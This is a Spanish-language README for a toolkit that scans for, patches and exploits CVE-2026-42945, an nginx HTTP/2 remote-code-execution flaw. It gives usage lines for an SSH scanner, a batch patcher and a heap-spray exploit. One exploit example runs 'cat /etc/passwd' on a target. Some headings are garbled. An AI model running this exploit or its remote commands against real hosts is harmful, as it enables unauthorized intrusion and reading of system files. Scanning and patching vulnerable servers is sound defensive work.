
Kit de herramientas automatizado para escanear, explotar y parchear CVE-2026-42945 (RCE crítico en nginx). Incluye escáner de red, exploit de heap spray y parcheador por lotes con informes HTML/JSON.
Kit de herramientas integral para escanear, parchar y probar CVE-2026-42945, una vulnerabilidad crítica de ejecución remota de código en nginx
Este kit proporciona herramientas completas para escanear, parchar y probar CVE-2026-42945, una vulnerabilidad crítica de ejecución remota de código en nginx que afecta a versiones anteriores a 1.26.3 (mainline) y 1.24.1 (stable).
La vulnerabilidad explota el análisis malformado de cabeceras HTTP/2 cuando ASLR está deshabilitado mediante técnicas de heap spray.
| Propiedad | Valor |
|---|---|
| ID de Vulnerabilidad | CVE-2026-42945 |
| Tipo | Ejecución Remota de Código (RCE) |
| Puntuación CVSS | 9.8 (Crítica) |
| Versiones Afectadas | < 1.26.3 (mainline) / < 1.24.1 (stable) |
| Versión Corregida | 1.26.3+ |
| Vector de Ataque | Análisis malformado de cabeceras HTTP/2 |
| Requisito Previo | ASLR deshabilitado en el sistema objetivo |
Escanea una subred o un solo host para identificar instalaciones vulnerables de nginx.
Características:
Parchea automáticamente instancias vulnerables de nginx a la última versión segura.
Características:
Prueba la vulnerabilidad CVE-2026-42945 mediante técnica de heap spray.
Características:
paramiko (>= 3.0.0) - Librería cliente SSH
rich (>= 13.0.0) - Formateo de terminal y barras de progreso
git clone https://github.com/gagaltotal/CVE-2026-42945-NGINX-Rift-Toolkit
cd CVE-2026-42945-NGINX-Rift-Toolkit
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

nginx_scanner.py)python3 nginx_scanner.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa
python3 nginx_scanner.py --subnet 192.168.1.10 --user root --key ~/.ssh/id_rsa
python3 nginx_scanner.py --subnet 10.0.0.0/30 --user admin --password "password"
python3 nginx_scanner.py --subnet 192.168.1.0/24 --port 2222 --user root --key ~/.ssh/id_rsa
python3 nginx_scanner.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa --output report.html
--subnet SUBNET Subred objetivo en formato CIDR (obligatorio)
--user USER Nombre de usuario SSH (por defecto: root)
--password PASSWORD Contraseña SSH
--key KEY_PATH Ruta a la clave privada SSH
--port PORT Puerto SSH (por defecto: 22)
--timeout TIMEOUT Tiempo de espera de conexión en segundos (por defecto: 5)
--output FILE Archivo de informe de salida (HTML/JSON)
--workers WORKERS Número de hilos concurrentes (por defecto: 20)
nginx_patcher.py)
python3 nginx_patcher.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa
python3 nginx_patcher.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa --dry-run
python3 nginx_patcher.py --subnet 192.168.1.0/24 --target-version 1.26.3 --user root --key ~/.ssh/id_rsa
python3 nginx_patcher.py --subnet 10.0.0.0/30 --port 2222 --user admin --password "password"
--subnet SUBNET Subred objetivo en formato CIDR (obligatorio)
--user USER Nombre de usuario SSH (por defecto: root)
--password PASSWORD Contraseña SSH
--key KEY_PATH Ruta a la clave privada SSH
--port PORT Puerto SSH (por defecto: 22)
--timeout TIMEOUT Tiempo de espera de conexión en segundos (por defecto: 30)
--target-version VERSION Versión de nginx a la que parchear (por defecto: última)
--dry-run Mostrar lo que se parchearía sin ejecutar
--workers WORKERS Número de hilos concurrentes (por defecto: 10)
exploit.py)
python3 exploit.py --target 192.168.1.100 --port 80
python3 exploit.py --target 192.168.1.100 --port 80 --command "cat /etc/passwd"
python3 exploit.py --target 192.168.1.100 --port 80 --spray 50
python3 exploit.py --target 192.168.1.100 --port 80 --verbose